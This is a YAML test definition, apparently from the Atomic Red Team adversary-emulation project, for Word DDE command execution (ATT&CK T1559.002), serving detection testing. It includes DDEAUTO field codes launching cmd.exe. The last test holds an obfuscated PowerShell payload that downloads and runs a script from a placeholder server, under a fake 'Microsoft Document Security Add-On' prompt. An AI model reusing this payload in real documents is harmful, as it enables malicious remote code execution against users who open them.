Carrie Roberts
d4709021fb
* updating atomics count in README.md [ci skip] * wip * handle spaces in path * update readme * fix typo --------- Co-authored-by: publish bot <opensource@redcanary.com>
66 lines
2.4 KiB
YAML
66 lines
2.4 KiB
YAML
attack_technique: T1559.002
|
|
display_name: 'Inter-Process Communication: Dynamic Data Exchange'
|
|
atomic_tests:
|
|
- name: Execute Commands
|
|
auto_generated_guid: f592ba2a-e9e8-4d62-a459-ef63abd819fd
|
|
description: |
|
|
Executes commands via DDE using Microsfot Word
|
|
supported_platforms:
|
|
- windows
|
|
executor:
|
|
steps: |
|
|
Open Microsoft Word
|
|
|
|
Insert tab -> Quick Parts -> Field
|
|
|
|
Choose = (Formula) and click ok.
|
|
|
|
After that, you should see a Field inserted in the document with an error "!Unexpected End of Formula", right-click the Field, and choose Toggle Field Codes.
|
|
|
|
The Field Code should now be displayed, change it to Contain the following:
|
|
|
|
{DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe" }
|
|
name: manual
|
|
- name: Execute PowerShell script via Word DDE
|
|
auto_generated_guid: 47c21fb6-085e-4b0d-b4d2-26d72c3830b3
|
|
description: |
|
|
When the word document opens it will prompt the user to click ok on a dialogue box, then attempt to run PowerShell with DDEAUTO to download and execute a powershell script
|
|
supported_platforms:
|
|
- windows
|
|
executor:
|
|
command: |
|
|
start "$PathToAtomicsFolder\T1559.002\bin\DDE_Document.docx"
|
|
name: command_prompt
|
|
- name: DDEAUTO
|
|
auto_generated_guid: cf91174c-4e74-414e-bec0-8d60a104d181
|
|
description: |
|
|
|
|
TrustedSec - Unicorn - https://github.com/trustedsec/unicorn
|
|
|
|
SensePost DDEAUTO - https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/
|
|
|
|
Word VBA Macro
|
|
|
|
[Dragon's Tail](https://github.com/redcanaryco/atomic-red-team/tree/master/ARTifacts/Adversary/Dragons_Tail)
|
|
supported_platforms:
|
|
- windows
|
|
executor:
|
|
steps: |
|
|
1. Open Word
|
|
|
|
2. Insert tab -> Quick Parts -> Field
|
|
|
|
3. Choose = (Formula) and click ok.
|
|
|
|
4. Once the field is inserted, you should now see "!Unexpected End of Formula"
|
|
|
|
5. Right-click the Field, choose "Toggle Field Codes"
|
|
|
|
6. Paste in the code from Unicorn or SensePost
|
|
|
|
7. Save the Word document.
|
|
|
|
9. DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe"
|
|
|
|
10. DDEAUTO "C:\\Programs\\Microsoft\\Office\\MSWord\\..\\..\\..\\..\\windows\\system32\\{ QUOTE 87 105 110 100 111 119 115 80 111 119 101 114 83 104 101 108 108 }\\v1.0\\{ QUOTE 112 111 119 101 114 115 104 101 108 108 46 101 120 101 } -w 1 -nop { QUOTE 105 101 120 }(New-Object System.Net.WebClient).DownloadString('http://<server>/download.ps1'); # " "Microsoft Document Security Add-On"
|
|
name: manual |